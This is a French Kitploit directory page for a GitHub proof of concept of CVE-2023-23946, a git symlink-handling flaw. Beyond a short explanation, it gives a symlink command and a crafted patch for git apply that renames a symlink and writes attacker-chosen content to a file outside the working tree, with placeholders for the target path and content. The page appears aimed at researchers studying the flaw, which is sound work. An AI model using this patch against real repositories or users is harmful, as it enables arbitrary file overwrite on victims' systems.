Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-23946-POC — Explication et POC de la CVE-2023-23946 | Kitploit
Outils/GitHubGitHub/bruno-1337/cve-2023-23946-poc
Analyse des VulnérabilitésExploitationArticles et RechercheApprentissage et ÉducationExploitation de Binaires
GitHubbruno-1337/cve-2023-23946-poc

CVE-2023-23946-POC

Explication et POC de la CVE-2023-23946

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit POC CVE-2023-23946

Explication et POC de la CVE-2023-23946

La vulnérabilité CVE-2023-23946 est causée par une faille dans la façon dont git gère les liens symboliques. Lorsque git crée un lien symbolique, il ne le traite pas réellement comme un lien symbolique et, à cause de cela, nous pouvons l'exploiter pour pointer vers des fichiers en dehors de l'arbre de travail.

Créez d'abord un lien symbolique

root@kitploit:~
ln -s [CHEMIN_QUE_VOUS_VOULEZ_ACCEDER_EN_DEHORS_DE_LARBRE_DE_TRAVAIL] symlink

Créez maintenant un patch à utiliser avec git apply

root@kitploit:~
diff --git a/symlink b/newsymlink
rename from symlink
rename to newsymlink
--
diff --git /dev/null b/newsymlink/spawn
new file mode 100644
index 0000000..e47f4ea
--- /dev/null
+++ b/newsymlink/[FICHIER_EXTERIEUR]
@@ -0,0 +1 @@
+[CE_QUE_VOUS_VOULEZ_A_L_INTERIEUR_DU_FICHIER]
\ No newline at end of file

Que fait le patch ? Nous changeons le nom du lien symbolique existant et créons un nouveau fichier. Ainsi, lorsque nous modifions /newsymlink/[FICHIER_EXTERIEUR], git n'applique pas ses protections contre les liens symboliques.

Télécharger l’outil